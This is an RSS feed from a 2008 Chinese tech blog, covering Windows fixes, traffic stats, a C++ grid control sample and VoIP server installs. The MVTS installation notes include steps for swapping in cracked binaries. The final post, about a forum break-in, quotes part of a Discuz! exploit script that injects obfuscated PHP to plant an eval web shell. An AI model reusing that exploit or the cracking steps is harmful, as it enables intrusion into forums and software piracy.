http://www.yueyong.net 星垂平野阔,月涌大江流 Mon, 15 Dec 2008 02:46:06 +0000 http://backend.userland.com/rss092 en 今天重启系统，突然上不了网了，网络连接故障。查找日志，发现是ipsec服务没有启动。打开本地安全策略，出现，不能打开IPSEC策略存储容器，找不到指定文件错误。最后解决 删除[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local] 然后重建ipsce 在CMD里输入regsvr32 polstore.dll http://www.yueyong.net/html/2008/12/15/ipsec-error.html 很有意思 http://www.yueyong.net/html/2008/12/13/xiongzao-guangga.html 每天的IP都是只有200多IP访问，今天偶尔上统计查看，吓我一大跳，PV居然过万，这是自从年初百度降权之后重新冲破1000IP，而且昨天就突破5000IP。仔细分析了统计数据，发现大部分流量都是从QQ来的，不晓得是哪个把我博客某篇文章转发到QQ论坛上，居然一天就来了7000多IP，看来QQ真是太强大了。以前百度收录多的时候最多也就给我带过3000IP。SOSO取代BAIDU应该是早晚饿事情 http://www.yueyong.net/html/2008/12/13/ip-7000.html VOS的盗版政策初见成效了，到处都在谈论VOS了，各大VOIP的BBS掀起一轮学习VOS的热潮，相比而言SVSS的就冷清多了，毕竟还不是太稳定的版本，用户的新鲜劲过了之后重归理性。 http://www.yueyong.net/html/2008/12/04/vos-cracking.html 这个月不小心碰到山寨机的短信陷阱，又被扣了12元。气死我了，后来在网上找到一个办法，就是打10086关闭梦网短信功能，这样再不小心碰到那些陷阱就会收到短信： 由于未经您的授权，本次请求未成功，如需使用，请致电10086中国移动进行开通。 http://www.yueyong.net/html/2008/11/28/shanzaiji-sp-xianjing-2.html 最近在维护一个SDK写的程序，某个显示界面要使用表格控件，在网上搜索了很多人的文章，参考了http://topic.csdn.net/t/20020702/14/843997.html 和http://www.titilima.cn/show-64-1.html 这两篇文章，做了个个MSFLXGRID.OCX版的测试程序，在VC++6中通过。 // testgrid.cpp : Defines the entry point for the application. // #include "stdafx.h" #import   "c:\windows\system32\msflxgrd.ocx"     #include   <atlbase.h>       CComModule   _Module;     #include   <atlwin.h>     #pragma   comment(lib,"atl")     #define   ODS(x)   OutputDebugString(x) // 处理连接点事件的接收器实现  class   CFlexGridSink   :   public  MSFlexGridLib::DMSFlexGridEvents     {     public:       CFlexGridSink() :m_pFlexGrid(NULL),m_dwRef(1),m_hrConnected(CONNECT_E_CANNOTCONNECT), m_dwCookie(0),m_pCP(NULL)     {     }         ~CFlexGridSink()     {     }   //控件初始化操作   HRESULT   Init(MSFlexGridLib::IMSFlexGrid*   pWin)     {     HRESULT   hr   =   NOERROR;     LPCONNECTIONPOINTCONTAINER   pCPC   =   ... http://www.yueyong.net/html/2008/11/28/sdk-msflxgrid.html 一、安装MVTS： cd /usr/local tar xvzf mvts-310-Linux.tar.gz cd ./mvts chmod 777 setup.sh ./setup.sh 输入： enter MVTS admin group id:  0 enter MVTS support group id: 0 enter MVTS billing group id: 0 全部输入root的group id为0 MVTS安装完成！ 二、解密： 将mp_kerneld.x拷贝到/usr/local/mvts/bin目录下 将文件权限改为：-r-xr-x—x （chomd 777 mp_kerneld.x） 三、执行MVTS /etc/rc.d/init.d/mvts start /usr/local/mvts/bin/mp_shell.x进入MVTS控制台 #>  show stat 显示MVTS状态 MVTS-SIP-HIT协议转换程序 安装SIP转换程序 tar zxvf SIP-HIT_1.1.2.10_linux.tar.gz ./install.sh /usr/local/siphit回车 安装完成 将 cr_siphit_linux.tgz拷到/usr/local/siphit目录下，解压覆盖原文件OK！ Chmod 777 convert mvts_manager.tar.gz 安装MVTS管理程序及WEB tar zxvf manager.tar.gz cd manager Chmod 777 setup [root@localhost manager]# ./setup MVTS directory? [/usr/local/mvts]: MVTS Manager directory? [/usr/local/mvts/manager]: File or directory /usr/local/mvts/manager exists. ... http://www.yueyong.net/html/2008/11/23/mvts-install.html 在国外论坛上看到Voipswitch 的新版又有了，983版，感觉除了支持Vista 之外，其他变化不大。难道Vista 用户很多吗？大部分的应该都是用语音网关吧，只要升级了SIP软电话就可以。有机会找个来测试下。 VPS983 --- Voipswitch version 2.0.0.983 Support dialer Vista include vippie! support new Webportal , support 15/30/60 sec for CDR display format support OnlineShop for paypal , online pay support Tunnel Server/Tunnel pc2phone Dialer/Tunnel Proxy **** VPN dialer for UAE/dubai/BD support Calling card Module , pin recharge support VoiceMail support Callshop Module support DID Callback / SMS ... http://www.yueyong.net/html/2008/11/18/voipswitch-version-200983.html VOS安装前准备    1：vi /etc/selinux/config   查看其中是否有 SELINUX=disabled  如果没有要设定如上  后重启服务器    2：rpm -qa|grep mysql       查看是否安装过musql   如装过就要用  rpm -e --nodeps mysql  强制删除    3：date                     查看系统时间    用 date -s ——  来修改新的时间  再用 clock --systohc把系统信息写入硬件    4：上传文件  用 sftp 统一在上传服务器建立 dl/tools和dl/v1.2.1-12目录 vos安装     cat /proc/version         系统内核信息     cat /proc/cpuinfo                cpu信息     cat /proc/meminfo         内存信息     1：查看是否安装perl    rpm -qa|grep perl     2:rpm -ivh perl -DBI-1.40-5.i386.rpm     3:rpm ... http://www.yueyong.net/html/2008/11/17/vos2000-install.html oo论坛昨天被挂马了，从日志里找到了挂马者的痕迹，通过wap/index.php注入，然后获得一个shell，拿到了mysql的密码，后提权。从挂马者留下的shell里找到了攻击代码发布的网站。找到了这段攻击代码。 要求比较高，需要开通WAP注册。 #!/usr/bin/php <?php /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */ $host = 'www.6sim.com'; // 服务器域名或IP $path = '/bbs/'; // 程序所在的路径 $key  = 1; // 上面的变量编辑好后，请将此处的值改为1 if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)      exit("专业点好不,先看看里面的注释 -,-\n"); error_reporting(7); ini_set('max_execution_time', 0); $key = time(); $cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1'; $resp = send(); preg_match('/logout=yes&amp;formhash=[a-z0-9]{8}&amp;sid=([a-zA-Z0-9]{6})/', $resp, $sid); echo $resp; if (!$sid)     exit("哦,大概是没有开启WAP注册吧 -,-\n"); $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}'; send(); $shell = 'http://'.$host.$path.'forumdata/cache/eval.php'; if (file_get_contents($shell) ... http://www.yueyong.net/html/2008/11/16/discuz61-hol.html